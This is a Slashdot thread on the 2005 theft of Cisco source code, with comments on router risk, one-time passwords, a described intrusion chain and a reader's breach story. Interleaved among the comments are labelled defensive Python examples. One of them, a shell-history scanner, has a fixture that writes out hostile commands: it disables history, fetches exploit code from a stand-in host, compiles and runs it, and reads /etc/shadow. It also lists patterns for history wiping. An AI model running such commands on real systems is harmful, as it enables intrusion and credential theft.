Security IT

More on Last Year's Cisco Source Code Theft

grazzy writes "The New York Times has a story about last year's theft of Cisco source code: The incident seemed alarming enough: a breach of a Cisco Systems network in which an intruder seized programming instructions for many of the computers that control the flow of the Internet. "
  • by P3NIS_CLEAVER ( 860022 ) on Tuesday May 10, 2005 @11:03AM (#12488583) Journal
    What's a Thef????
  • Stakkato (Score:3, Interesting)

    by natron 2.0 ( 615149 ) <`moc.liamg' `ta' `97sretepdn'> on Tuesday May 10, 2005 @11:03AM (#12488593) Homepage Journal

    so now the hunt is on for the elusive stakkato...

  • cmdr taco (Score:4, Funny)

    by mondoterrifico ( 317567 ) on Tuesday May 10, 2005 @11:03AM (#12488596) Journal
    Master of the ebonics.
  • by Anonymous Coward on Tuesday May 10, 2005 @11:05AM (#12488615)
    self defending?????
  • by wcitech ( 798381 ) on Tuesday May 10, 2005 @11:06AM (#12488619)
    I'm without a doubt no networking expert, so I'd like to ask one of you who is: if the source code for Cisco's equipment is leaked, would that person have the ability to create some kind of virus/malware that could bring the internet to a screeching halt? What can they do, infect routers with viruses now? I guess I'm unclear on the real dangers in a situation like this.
    • by CaymanIslandCarpedie ( 868408 ) on Tuesday May 10, 2005 @11:10AM (#12488661) Journal
      No, that just makes it more secure since more eyes will be looking at it ;-)
    • by Phil246 ( 803464 ) on Tuesday May 10, 2005 @11:11AM (#12488676)
      only if there are flaws in said code.
      • whoever modded this a troll - turn in your badge of geekhood. Flawless sourcecode is useless when it comes to trying to use it to do damage. Only if there are flaws IN the code, will it be possible to damage routers by exploiting it.
        While I agree with the general statement, I'm not sure it's of any real value. Where is this flawless source code? Based on recent experiences with Cisco code, Cisco certainly doesn't have it. I don't mean to single out Cisco. Look at the history of OpenSSH, and I think the OpenBSD folks write high-quality, security-conscious code.
    • No, likely not.

      1) Cisco IOS does not run the *whole* Internet. Different IOS versions apply as well.

      2) Revealed source code != massive untapped exploits.

      3) IOS doesn't have an execution environment with "open" interfaces like a desktop OS. Routers don't execute transport data or routing data. This means no script kiddies. There are of course other ways to crash a router.

      4) IOS is mature and (obviously) well tested. People have been throwing all sorts of strange things at Cisco routers for a long ti
      • 3) IOS doesn't have an execution environment with "open" interfaces like a desktop OS. Routers don't execute transport data or routing data. This means no script kiddies. There are of course other ways to crash a router.

        I kinda wonder about this sometimes. As a for instance, here [cisco.com] is an excellent example of how to write an SMTP client in the TCL shell included in recent IOS versions. Of course, getting the shell to start out with is left as an exercise to the reader, but routers operate more and more he

      • 1) Cisco IOS does not run the *whole* Internet. Different IOS versions apply as well.

        It runs enough of the backbones to cause very serious problems if it is compromised.

        2) Revealed source code != massive untapped exploits.

        I wouldn't want to count on that. It's possible that their code is perfect, but....

        3) IOS doesn't have an execution environment with "open" interfaces like a desktop OS. Routers don't execute transport data or routing data. This means no script kiddies. There are of course ot

      Even with the leaked source code, you'd have to be quite a skilled programmer to find flaws which you could exploit in there.
      The strength (and flaws) of the internet come from the versatile equipment used in creating it. Most operators have their own device setup they're familiar with.
      Not everything runs with Cisco, though they would probably want it that way. (ca-ching)

      The hardware in question isn't your average Linux/BSD router, so you can't just whip up an exploit with an x86 compiler and push it in.
      Since the system
  • Missing (Score:2, Redundant)

    by nizo ( 81281 ) *
    One slightly used t. Reward if found.
  • Doesn't make sense (Score:4, Interesting)

    by afidel ( 530433 ) on Tuesday May 10, 2005 @11:08AM (#12488636)
    Cisco uses two factor one time passwords for remote access. I don't see how planting a trojaned copy of SSH on the lab computers would give the hacker access to Cisco's systems.
    • by dr_dank ( 472072 )
      From the tone of the article, it seems that a keylogger was used to grab passwords from a cisco user, which were then used from machines in that lab remotely exploited by an ssh rootkit.
      • by afidel ( 530433 )
        Yes, but if things were working as they should have been, a password logger doesn't do you ANY good. The password as entered by the user consists of two parts: the first part is their passphrase, which is like a traditional password, but the second part is a numeric sequence which is spat out by a numeric fob which is synced to the master access server. These combined passwords must be entered within a narrow window, and once accepted are no longer valid. Someone must have f'd up big time to allow an interne
        • by dr_dank ( 472072 )
          It's not easy to pull off, but if you can enter the sequence before it expires, you can gain entry. IIRC, for the RSA SecurIDs, it's 90 seconds.
          • That's an understatement. I read the original description of the timing security flaw, and it was far from practical to exploit. Let's just say that you needed a real-time key logger on your target user, and the ability to type _very_ fast just to get started. I'm not aware of the weakness ever being exploited, and it was fixed prior to 2000.

            Meanwhile, people are still coming up with amusing weaknesses! Here's one that merely requires stealing the user's token for a week without their knowledge, and having
          • by afidel ( 530433 )
            Nope, once it is used that sequence is removed from the valid pool. This is to ensure against replay attacks just as you describe. I've done it to myself before where I hit disconnect by accident and was unable to relogin until the next number came up on the fob.
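The two properties argued over in the replies above (a short acceptance window around the current time step, and a code dying the moment it is accepted) are easy to see in code. This is an added example, not code from any commenter and not the SecurID implementation: a small time-based OTP verifier in Python using the HMAC-SHA1, 6-digit, 30-second-step construction of RFC 4226/6238. The step, drift window and the secret in the demo are assumptions; the RFC test secret is used only so the codes are reproducible.

```python
import hashlib
import hmac
import struct
import time

# Added example: time-based OTP verification with a small clock-drift window
# and single-use enforcement.  HOTP/TOTP per RFC 4226/6238 (HMAC-SHA1,
# 6 digits, 30-second steps).  Step and window sizes are assumed values.

STEP_SECONDS = 30
DIGITS = 6
DRIFT_WINDOW = 1      # also accept the previous and the next 30-second step


def hotp(secret: bytes, counter: int, digits: int = DIGITS) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the big-endian counter, dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, at: float, step: int = STEP_SECONDS) -> str:
    """What the fob displays at Unix time `at` (the token side of the exchange)."""
    return hotp(secret, int(at // step))


class OtpVerifier:
    """Server side: accept a code once, inside the drift window, and never again."""

    def __init__(self, secret: bytes, step: int = STEP_SECONDS, window: int = DRIFT_WINDOW):
        self.secret = secret
        self.step = step
        self.window = window
        self.last_counter = -1   # highest time-step counter ever accepted for this user

    def verify(self, code: str, now=None) -> bool:
        now = time.time() if now is None else now
        current = int(now // self.step)
        for counter in range(max(0, current - self.window), current + self.window + 1):
            if counter <= self.last_counter:
                continue          # already consumed, or older than one that was: replay rejected
            if hmac.compare_digest(hotp(self.secret, counter).encode(), code.encode()):
                self.last_counter = counter   # burn this step and every earlier one
                return True
        return False


if __name__ == "__main__":
    # constructed demo: RFC 4226 test secret, clock pinned at Unix time 59 (step 1)
    secret = b"12345678901234567890"
    verifier = OtpVerifier(secret)
    shown = totp(secret, 59)                 # what a synced fob would display
    print(verifier.verify(shown, now=59))    # True: first use inside the window
    print(verifier.verify(shown, now=59))    # False: the same code replayed seconds later
```

The guard is the `last_counter` line: once a step is accepted, that step and everything before it are dead even though the drift window still covers them, which is the behaviour described above of being locked out until the fob rolls over. Note what it does not do: a keylogger that relays the code inside the window still gets exactly one login; single-use only stops the second one. A deployment would persist `last_counter` per user and rate-limit guesses, since six digits with a three-step window is a small space to brute force.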
    • by rcw-home ( 122017 ) on Tuesday May 10, 2005 @12:01PM (#12489232)
      Cisco uses two factor one time passwords for remote access. I don't see how planting a trojaned copy of SSH on the lab computers would give the hacker access to Cisco's systems.

      I don't know how Cisco has their stuff set up, but it's easy to imagine such a breach playing out:

      1. Black hat replaces ssh client at University lab computer.
      2. Authorized but unwitting user uses University computer to VPN into Cisco's network and then uses the trojaned ssh client to connect to a computer on Cisco's network.
      3. The trojaned ssh client is now able to execute arbitrary code as the unwitting user on an internal Cisco computer. It uploads an executable to the internal Cisco computer that regularly makes outgoing TCP connections (they could even look like web browser traffic) to a computer under the black hat's control. The black hat sends control commands through these connections which the executable gladly obeys.
      4. The black hat is now free to scan the internal network to look for a host they can get root on, or hope that the user's account on the internal server they control will be used to connect to other internal systems, perhaps using more highly privileged accounts. (Any admins ever had to sit down at a user's computer and ssh into a server to fix something?) The longer the initial breakin is left unidentified, the better the chances of this occurring.
      5. Eventually the black hat will strike paydirt and get root on a system. From then on, the rootkit that the black hat installs can use any credentials anyone uses to access any systems remotely. Ssh into something? It can run commands on the remote host. Connect to a file server? It can replace executables that you have write access to and wait for someone else to run them.

      While an attacker would need a fairly deep understanding of the software infrastructure he is attacking and of the usage habits of the users there to pull this off, the same basic strategy is applicable to UNIX, Windows, anything. I remember reading several years ago that the breakins at Exodus and VA Linux happened this way.

      We're only used to the stuff we hear about not doing any real damage, because it's all dumb worms running without anyone at the controls. Just because we can fend off that stuff doesn't mean that someone with determination, knowledge, and patience won't get in and stay in.
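Step 3 of the chain above, an implant that "regularly makes outgoing TCP connections (they could even look like web browser traffic)", is also the step that is easiest to spot from the outside, because the regularity itself is the tell. As an added example (mine, not part of the comment above and not a tool from the article), here is a Python beacon detector run over a few constructed flow-log lines: it groups connections by source and destination and flags pairs whose inter-connection gaps are nearly constant. The log format, hosts, interval and thresholds are all assumptions.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timezone

# Added example: find the implant from step 3 by the regularity of its callbacks.
# Flow-log format, hosts and thresholds are constructed for this example; real
# exports (NetFlow, Zeek conn.log, firewall logs) need their own parser but the
# same grouping and timing logic.

# constructed log, one connection per line: "<iso-timestamp> <src> <dst:port> <bytes>"
FLOW_LOG = """\
2005-05-03T09:00:00 10.1.2.15 198.51.100.7:80 1432
2005-05-03T09:00:41 10.1.2.15 203.0.113.9:443 9031
2005-05-03T09:01:03 10.1.2.15 203.0.113.9:443 2210
2005-05-03T09:05:00 10.1.2.15 198.51.100.7:80 1440
2005-05-03T09:07:30 10.1.2.15 203.0.113.9:443 87012
2005-05-03T09:10:01 10.1.2.15 198.51.100.7:80 1436
2005-05-03T09:12:12 10.1.2.15 203.0.113.9:443 640
2005-05-03T09:12:15 10.1.2.15 203.0.113.9:443 55120
2005-05-03T09:15:00 10.1.2.15 198.51.100.7:80 1431
2005-05-03T09:19:59 10.1.2.15 198.51.100.7:80 1439
2005-05-03T09:21:00 10.1.2.15 192.0.2.20:443 3100
2005-05-03T09:25:00 10.1.2.15 198.51.100.7:80 1433
2005-05-03T09:26:00 10.1.2.15 192.0.2.20:443 3090
"""


def parse_flows(text):
    """Group connection start times (Unix seconds) by (source, destination)."""
    flows = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, src, dst, _nbytes = line.split()
        when = datetime.fromisoformat(stamp).replace(tzinfo=timezone.utc)
        flows[(src, dst)].append(when.timestamp())
    return flows


def find_beacons(flows, min_events=4, max_cv=0.05):
    """Return (src, dst, mean_gap_seconds, cv) for pairs whose connection gaps are near-constant.

    cv is population stdev / mean of the gaps between successive connections.
    Human browsing to one site is bursty (cv around 1); a sleep(300)-style
    callback sits near 0 even with a few seconds of jitter.  min_events keeps
    two or three chance hits from qualifying.
    """
    hits = []
    for (src, dst), times in flows.items():
        if len(times) < min_events:
            continue
        times = sorted(times)
        gaps = [later - earlier for earlier, later in zip(times, times[1:])]
        mean_gap = statistics.mean(gaps)
        if mean_gap <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean_gap
        if cv <= max_cv:
            hits.append((src, dst, round(mean_gap), round(cv, 3)))
    return sorted(hits)


if __name__ == "__main__":
    for src, dst, gap, cv in find_beacons(parse_flows(FLOW_LOG)):
        print(f"possible beacon: {src} -> {dst} every ~{gap}s (cv={cv})")
```

In the constructed log the port-80 connections to 198.51.100.7 carry browser-sized payloads, so byte counts say nothing, but the five-minute cadence gives them a cv of about 0.003 while the real browsing to 203.0.113.9 scores near 1. Implants that randomise their sleep defeat a plain cv threshold; the usual next step is a histogram of gaps (a jittered beacon still clusters around one value) and a longer observation window. NAT and proxies collapse many users onto one source address, so run this on the inside of the gateway.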

  • Timing.. (Score:5, Interesting)

    by gmerideth ( 107286 ) <gmerideth&uclnj,com> on Tuesday May 10, 2005 @11:08AM (#12488637) Homepage
    Rather good timing that last night on "24" we see Cisco's name all over the screens at the CTU command center and the actress works in the line "the Cisco network is defending itself" followed immediately by an Alienware laptop on the screen.

    Just in time for major articles about how bad Cisco's security was that they had some source code stolen. /golfclap foxtv

    And people wonder why I don't watch television. Sad..just sad.
    • Re:Timing.. (Score:3, Insightful)

      by Anonymous Coward
      If you don't watch TV, how did you see that?
    • Re:Timing.. (Score:5, Funny)

      by gad_zuki! ( 70830 ) on Tuesday May 10, 2005 @12:26PM (#12489436)
      >And people wonder why I don't watch television.

      So this vision of 24 came to you in a fever dream then?
    • Re:Timing.. (Score:2, Insightful)

      by JTek ( 5392 )
      Last night on "24"...And people wonder why I don't watch television. Sad..just sad.

      Obviously, you do watch television.
    • I got stuck watching "CSI: Miami" with the in-laws. I've never seen "24", but it can't be more inaccurate than "Miami": "Hey, we've got an X-ray machine's serial number - let's just type it into the Bat Crime Computer to see who bought it."

      My wife kept looking at me to watch my reaction to the on-screen stupidity and eventually said that she'd never actually heard anyone roll their eyes before.

  • This definitely goes to show that www.hackiis6.com's 18yr old rule was probably imposed to simply limit the number of hackers who will enter. Props to the kid for pulling this off... even if he did get into trouble =).
  • Alarming ? (Score:5, Insightful)

    by alexhs ( 877055 ) on Tuesday May 10, 2005 @11:10AM (#12488656) Homepage Journal
    The incident seemed alarming enough

    Why alarming ? The internet is still up and running since that last years theft.

    (I guess it should be read last year's)

    Sensational breaking news!
    The programming instructions of Linux and Free/Net/OpenBSD, which run many big corporations' servers, are available to the sight of anybody! That's alarming!

    • Re:Alarming ? (Score:3, Interesting)

      by iztaru ( 832035 )
      I think the problem with this could come from two corners: 1- The people at Cisco are not as confident with their source code as the people of Linux, Free/Net/OpenBSD 2- There are back doors in the Cisco systems for the government to use and they are afraid anyone else might find them useful!
    • programming instructions

      Programming instructions? In the popular press (at least in Sweden), stolen source code is referred to as source codes and in such a way that it sounds like stolen passwords.
  • Wren Montgomery (Score:3, Insightful)

    by kevin_conaway ( 585204 ) on Tuesday May 10, 2005 @11:10AM (#12488658) Homepage
    So let me get this straight. This lady knew that someone had breached her system and she a.) kept right on using it and b.) taunted the person who had breached her system? What was she thinking? If your machine has been compromised, pull the plug and clean it!
  • Contradiction? (Score:5, Insightful)

    by simon2263 ( 799241 ) on Tuesday May 10, 2005 @11:12AM (#12488682)
    On one hand, the article claims that "With such information, sophisticated intruders would potentially be able to compromise security on router computers of Cisco customers running the affected programs" and on the other hand that Cisco itself claims that "the improper publication of this information does not create increased risk to customers' networks". These statements are, IMHO, in direct contradiction of each other. Who the hell should we believe?
    • As odd as it sounds, both are correct. A sophisticated intruder could compromise security with the stolen code. Or not.

      But for the sake of argument, suppose they do find flaws in Cisco's code. An exploit shows up on rootkit.org or someplace. It should be apparent from the exploit which flaws they're using, and so Cisco cleans up the flaw. In the long run, customers are actually safer.

      It's sort of a backasswards way to open source your code.

  • Thef (Score:4, Interesting)

    by Doc Ruby ( 173196 ) on Tuesday May 10, 2005 @11:14AM (#12488701) Homepage Journal
    What do Slashdot "authors" (editors) do all day? They publish about 35 stories in a 24 hour cycle, usually about 4 editors participating. That's about 1-2 stories an hour, with 1-2 authors overlapping shifts. The summaries take about 2 minutes max to read, and the stories take max 5-10 minutes. That seems ample time to catch dups, fix typos, spelling and punctuation errors. Why not? What else are they doing? Maybe they don't read Slashdot after they've published, so they don't see all the feedback on their poor editing performance.
    • Re:Thef (Score:5, Funny)

      by gowen ( 141411 ) <gwowen@gmail.com> on Tuesday May 10, 2005 @11:27AM (#12488846) Homepage Journal
      What else are they doing?
      Applying massive amounts of negative mod-points to posts criticising Slashdot Editors... See you at (-1, Troll), baby.
    • Re:Thef (Score:5, Interesting)

      by Doc Ruby ( 173196 ) on Tuesday May 10, 2005 @12:06PM (#12489278) Homepage Journal
      Moderation 0
      50% Interesting
      20% Troll
      20% Redundant

      Where's another post running a time analysis of Slashdot editing? Even given Slashdot's absence of features to prevent comment redundancy, isn't a chorus of "not again!" appropriate? And how is my coherent, accurate comment, which I haven't seen before, a "Troll"?

      Perhaps this comment is just the criticism uberpost, destined to point out all the serious flaws in Slashdot's publishing system model. If so, here's some constructive suggestions for fixing it:

      1. Submitted story queue filter: editors see a story, with links listed separately (already a Slashcode function). Links already published in a previous story are indicated, linked to the previously published story. Publishing such links includes an "ongoing coverage" indication in the new published story.

      2. Submission spell/grammar checker

      3. Submission link checker: links in stories in submission queue are interlinked through a Slashdot redirection script which sets a flag. Until each link's flag has been set, by following the link (through the script) to the linked object, the story cannot be published.

      4. Mod comments: Negative moderation must be accompanied by an explanatory comment, which can be viewed by metamoderators. Metamoderation gets more "teeth", with 3 "unfair" metamods cutting modpoints for a month, and 3 such suspensions cutting modpoints forever.

    • They use Windows. (C'mon, where do you think all the Windows trolls here come from and why are all Windows trolls modded up?)

      And haven't figured out how to use the spellchecker since it's on a menu, not an icon (on the desktop.)

  • by kclittle ( 625128 ) on Tuesday May 10, 2005 @11:16AM (#12488716)
    ...that all the discovered breaches are by inept, pimply-faced teens (regardless of how many times some news article quotes some 'expert' about how 'particularly clever' the idiot was), and that the really serious harm is being done by real pros who never leave a trace.
    Scary...
    • ...the one you see running across your living room is the stupid one that isn't doing any damage and will probably win (or lose!) the Darwin award by stepping into a trap.

      It's the SMART mice eating the food in your cupboard and breeding in the walls that you don't see you have to be concerned with.

      The same comments apply to serial killers. The dumb ones get caught, the smart ones are scary.
        Heh, heh, let me tell you about one stupid blind mouse...

        In a former living quarters (too disgusting to describe), I'm lying on my bed and I look over and see this mouse come out of a hole in the wall next to my bed, ignore me, walk down the wall, and turn the corner into the bathroom.

        "Okay, smart ass, I got your ignore right here!", says I.

        I take out a glue trap, put it right at the corner to the bathroom.

        Sure enough, five minutes later, El Stupido comes waltzing around the corner following his nose whiskers as
    • inept, pimply-faced teens

      Careful now - let's not invite JonKatz back into the picture...
  • by daniel_mcl ( 77919 ) on Tuesday May 10, 2005 @11:17AM (#12488726)
    As a good number of regular Slashdot readers are no doubt aware, full source code to Linux, Apache, etc. is available to anyone, and they are more secure than their counterparts for this reason. If access to the source code for Cisco routers makes it possible to write a whole bunch of backbone-targeting virii, that would really drop my opinion of Cisco routers considerably.

    If you actually read the article, the exploit was no big deal either; some guy just distributed a trojan'd SSH client to a bunch of people, collected their passwords, and then ran a bunch of rootkits. Nothing to see here.
    • Right, but the difference is that the maintainers for Linux, Apache, et al. *know* the source is available. If a hole is discovered, it has to be fixed, as anyone with the source may have already discovered it and might be prepping a 0-day exploit.

      Cisco doesn't have to worry in the same way as no one else can see their code. There's less incentive to fix known potential holes and less incentive for Cisco to search the code for potential exploits.

      Except....

      So, yes. I'd be very surprised if Cisco routers
  • Cisco VPN Client (Score:2, Interesting)

    by Malc ( 1751 )
    Tell me again why our IT department insists on using this buggy Cisco VPN Client POS that causes me grief on a daily basis...
    • Gotta love the Cisco VPN client. Version 4(think that's one) doesn't work at all on Windows 2k(at least to me). Falling back to version 3 has less-than-stellar performance.

      I remember using version 4 on WinXP and hitting connect instantly rebooted my system.

      Great joerb!
  • by Ancient_Hacker ( 751168 ) on Tuesday May 10, 2005 @11:26AM (#12488827)
    "last years theft" : A theft, in the last years of Cisco "last year's theft": A theft, in the previous year. Apostrophes do make a difference.
  • by Jetifi ( 188285 ) on Tuesday May 10, 2005 @11:29AM (#12488871) Homepage
    I mean, 'cybersecurity' bigheads are all worried about Terrorists disabling our Internet Infostructure etc., but in real life it turns out that any vulnerabilities that could be used to break into (e.g.) the JPL, White Sands, the DoD etc. have already been exploited by petulant teenagers.

    So in this sense, the script kiddies of the Internet are kinda like an early warning system: it's almost certain that before someone with serious intentions finds a nasty flaw and uses it, it'll be discovered by some kid who will promptly boast about it on IRC.

    How lucky we are that terrorists find themselves vastly outnumbered by people with too much free time on their hands!
  • by Anonymous Coward
    In other news, the source code for a different router/firewall technology was posted on the net: http://www.openbsd.org/cgi-bin/cvsweb/ [openbsd.org]
  • by Heisenbug ( 122836 ) on Tuesday May 10, 2005 @11:35AM (#12488941)
    a breach of a Cisco Systems network in which an intruder seized programming instructions for many of the computers that control the flow of the Internet.

    Just wait until these guys see apache.org ...
  • John Markoff (Score:5, Informative)

    by wackysootroom ( 243310 ) on Tuesday May 10, 2005 @11:37AM (#12488953) Homepage
    Note that this article was written by the person famous for creating the myth of Kevin Mitnick being a super hacker. Markoff is largely responsible for the fear and paranoia surrounding Mitnick and consequently his unfair prison experience.

    His articles were full of lies and exaggerations back then so I would take this article with a grain of salt as well.
    • Thank you so much for pointing this out; the article seemed very fuzzy, now I know why.
    • Note that this article was written by the person famous for creating the myth of Kevin Mitnick being a super hacker. Markoff is largely responsible for the fear and paranoia surrounding Mitnick and consequently his unfair prison experience.

      Kevin, we have a deadline, and you don't have time to be playing on /. Get back to work.

      -- your boss

  • If the code in its entirety is leaked to a real self-respecting hacker, he ought to port the thing to x86 systems, possibly building a network driver interface to linux's network drivers. Before you know it, there are dell machines routing packets using IOS 12.4.

    Hopefully that will motivate someone to build an IOS clone on an OpenBSD or NetBSD subsystem for multiple architectures...

    mmmmmmmm IOS source code *drool*

    • Since IOS seems to consist of a brain-damaged circa-1965 UNIX clone with a command-line only a router engineer could love, I'd say it shouldn't be too difficult to implement it after taking a one-semester course in BASIC...

      Their machines are basically 33MHz 486's with 8 or 16 MB of RAM, some interface chips and some ASICs.

      If it wasn't for the ASIC chips, Cisco would have been out of business years ago.

  • by Anonymous Coward on Tuesday May 10, 2005 @11:46AM (#12489054)
    Note that this article is by John Markoff, who has established a history of trying to milk arrests of people for his own personal profit, by not only sensationalizing security breaches, but assisting authorities to the point of being on site during the arrests, and doing book and movie deals afterwards.

    Don't confuse this story with independent journalism; Markoff is out to make a mint here, however he can.

    Markoff reportedly was pissed off at Kevin Mitnick for spurning a movie deal, and later set himself up to write "the Kevin Mitnick story", earning over a million dollars in the process.

    Here's a link: http://www.labmistress.com/kevins_story.php [labmistress.com]

    So one really has to wonder what the Truth is here, and whether Markoff is just trying to screw over some teenage kid in Europe in order to make another million off of it.

    So I'd take anything that John Markoff has to say with a LARGE grain of salt. The same goes for the New York Times, which has officially encouraged this practice.

    The real truth is probably out there; but I wouldn't expect to hear it from either John Markoff or the NY Times.

  • We got hit. (Score:5, Interesting)

    by glockenspieler ( 692846 ) on Tuesday May 10, 2005 @11:48AM (#12489068)
    My laboratory was hit. We're all Linux machines. Turns out that I still had an account on a system at Stanford where I was faculty, and I transferred some files via scp to my machine at my current university. 4-5 days later, I see some logins from Stanford to my machine, but because I had been using the Stanford account recently, it just didn't register.

    One day later, I'm on another lab machine using my lab /home directory (different from my main machine) and I notice a program (it was either brk.c or dobrk.c, I think) that, on an unpatched system, allowed a privilege escalation. I switch to root and look at the history and see a command to stop recording the command history, but he (and the article indicates the person is male) mistyped it, so I could see that he logged into this machine from mine, grabbed the source code for the exploit from a warez site, compiled, ran, got root, and just tooled around a little.

    Because our machines are pretty isolated and don't have any hint of financial stuff, he seemed to just drop it. I called the sysadmin at Stanford; turned out that on a machine with over 500 accounts (I won't say which department), the machine had been rooted about 2 months prior and every password was being captured during that time. The breakin was tracked back through a couple of departments, then back to University of Michigan, then to Uppsala.

    Three valuable and perhaps obvious lessons here. Local privilege escalation exploits are important even if your system has very few users. Keep your system patched (duh...), and remember, if you log onto your machine from another, ask yourself "What do I know about the integrity of this machine?". I really assumed that my Stanford account was pretty secure and so I didn't even think about logging from that machine to my current one. No more.

    The other interesting thing was that the local exploit used on my machines was announced well after the Stanford machine was hit. I don't think I ever heard of how that machine was compromised.
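The mistyped "stop recording the command history" line in the post above is worth building a check around, because the command an intruder types to hide a session is itself the loudest thing in the session, and a typo should not let it slip past. This is an added example (mine, not the poster's code): a Python scan over a constructed root shell history that flags near-misses of the bash history variables, so HISTFLE trips it as surely as HISTFILE, and the download, compile, run chain the post describes. The history lines and the URL host are made up for the example; only the file name dobrk.c comes from the thread.

```python
import difflib
import re

# Added example: review a reconstructed root shell history for the two things the
# post describes, an attempt to stop history recording (mistyped or not) and a
# download-compile-run of a local exploit.  The history below is constructed;
# exploit.example.invalid is a made-up host and dobrk.c is the name from the thread.

HISTORY_VARS = ["HISTFILE", "HISTSIZE", "HISTFILESIZE", "HISTCONTROL"]
WIPE_COMMANDS = ("history -c", "history -w", "rm ~/.bash_history", "rm .bash_history")
DOWNLOADERS = ("wget", "curl", "fetch", "ftp")
COMPILERS = ("gcc", "cc")

# constructed root history, in the order the commands were typed
ROOT_HISTORY = """\
unset HISTFLE
cd /tmp
wget http://exploit.example.invalid/tools/dobrk.c
gcc -o dobrk dobrk.c
./dobrk
id
cat /etc/shadow
""".splitlines()


def _looks_like_history_var(token):
    """True for HISTFILE etc. and for close typos of them (HISTFLE, HISFILE, HISTSIZ)."""
    return bool(difflib.get_close_matches(token.upper(), HISTORY_VARS, n=1, cutoff=0.8))


def suspicious_history(lines):
    """Return (line_no, reason, command) for history tampering and download/compile/run chains."""
    findings = []
    downloaded = set()    # *.c sources fetched from the network
    built = {}            # binary name -> downloaded source it was compiled from
    for n, raw in enumerate(lines, 1):
        cmd = raw.strip()
        if not cmd:
            continue
        words = cmd.split()

        # 1. history tampering: unset/export/assignment of a HIST* variable (typos
        #    included) or an outright wipe of the history file
        if words[0] in ("unset", "export") or "=" in words[0]:
            for tok in re.findall(r"[A-Za-z_]+", cmd):
                if _looks_like_history_var(tok):
                    findings.append((n, "history tampering", cmd))
                    break
        elif cmd.startswith(WIPE_COMMANDS):
            findings.append((n, "history tampering", cmd))

        # 2. download -> compile -> run, tracked by file name across lines
        if words[0] in DOWNLOADERS:
            for m in re.finditer(r"([\w.-]+\.c)\b", cmd):
                downloaded.add(m.group(1))
        elif words[0] in COMPILERS:
            sources = [s for s in re.findall(r"\b([\w.-]+\.c)\b", cmd) if s in downloaded]
            if sources:
                out = re.search(r"-o\s+(\S+)", cmd)
                built[out.group(1) if out else "a.out"] = sources[0]
        else:
            exe = words[0][2:] if words[0].startswith("./") else words[0]
            if exe in built:
                findings.append((n, f"ran {exe} compiled from downloaded {built[exe]}", cmd))
    return findings


if __name__ == "__main__":
    for line_no, reason, cmd in suspicious_history(ROOT_HISTORY):
        print(f"line {line_no}: {reason}: {cmd}")
```

Run against the constructed history this reports line 1 (the typo'd unset) and line 5 (./dobrk, compiled from a source that arrived over the network two lines earlier). The fuzzy match is the point: an exact-string rule for "unset HISTFILE" would have missed exactly the command the poster found. Two caveats from the post itself: the history only exists because the attacker failed to disable it, so this is an after-the-fact review aid, not a control; and the account used to arrive was legitimate, so the login itself, which is what the poster saw first, only stands out if you also keep a per-account list of expected source hosts.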
    • Re:We got hit. (Score:5, Informative)

      by s.d. ( 33767 ) on Tuesday May 10, 2005 @12:19PM (#12489384)

      It was probably dobrk; that was one of the vulnerabilities the attacker(s) used last year to root systems.

      See http://xforce.iss.net/xforce/xfdb/13880 [iss.net] (this was the first Google link I saw; there are probably others with better information, but I'm lazy).

    • Turns out that I still had an account on a system at Stanford where I was faculty and I transferred some files via scp to my machine at my current university.

      ...

      Remember, if you log onto your machine from another, ask yourself "What do I know about the integrity of this machine?". I really assumed that my stanford account was pretty secure and so I didn't even think about logging from that machine to my current one.

      The key principle is that security is not inherently symmetrical between an

    • Re:We got hit. (Score:4, Insightful)

      by natet ( 158905 ) on Tuesday May 10, 2005 @01:40PM (#12490301)
      One other thing you should be aware of: Pull, don't push, data. In other words, don't log into a remote system and then use scp to send the data back to your system. That exposes your password on your local system to the remote system. Instead, use one shell window to find what you want to get, then open a separate shell window on your system to pull the data from the remote system, or use any one of the many graphical SCP clients to log in, navigate around, and pull data back down.

      I have seen several incidents where the former pattern was used and it resulted in a compromise of the users password. The lab where I work has gone to 2 factor authentication to make exploiting this pattern more difficult, but with session hijacking, it is nearly impossible to eliminate.

      I also want to point something out to those that have been criticizing Cisco's network security. The failure wasn't on the Cisco side of things. The actual security breach happened on a network 1 or more hops away from the Cisco network. As far as Cisco was concerned, a legitimate network transaction was happening. Someone with valid credentials logged on to the system, and until they do something out of the ordinary (install a root kit, scan the network, etc...) they are virtually undetectable, as they don't differ from normal valid network usage.
  • is this "More On Some Topic", or "Some Topic for Morons"? Looks to me like someone just submitted a mainstream news article which dumbs everything down and pisses off slashdotters in the process.
  • In other news, there are reports of books on "CCNA Certification" which tell hackers how to take control of Cisco's internal router software.
